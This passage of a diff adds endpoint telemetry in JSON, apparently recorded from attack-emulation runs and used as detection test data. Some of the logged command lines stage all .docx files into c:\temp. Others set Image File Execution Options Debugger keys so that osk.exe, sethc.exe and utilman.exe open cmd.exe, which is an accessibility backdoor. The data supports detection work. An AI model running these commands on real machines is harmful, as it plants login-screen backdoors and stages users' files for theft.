"process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "process", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571821830000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "process", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "subtype": "terminate", + "timestamp": 131883571821830000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "process", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571821830000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "file", + "file_name": "FINDSTR.EXE-4176B665.pf", + "file_path": "C:\\Windows\\Prefetch\\FINDSTR.EXE-4176B665.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571821830000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /R c: %%f in (*.docx) do copy %%f c:\\temp\\\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2012, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571822010000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "process", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571822140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3088, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571822270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "process", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571822300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\osk.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4816, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571824540000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\osk.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4564, + "ppid": 4816, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571824630000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-001062235101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "registry", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe", + "registry_value": "osk.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "registry", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "process", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "process", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6884, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571824790000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "process", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571824800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\sethc.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5648, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571825390000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\sethc.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1284, + "ppid": 5648, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571825470016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "registry", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", + "registry_value": "sethc.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "registry", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "process", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "process", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5036, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571825639984, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "process", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\utilman.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7448, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571826260000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\utilman.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3444, + "ppid": 7448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571826340000, + "unique_pid": 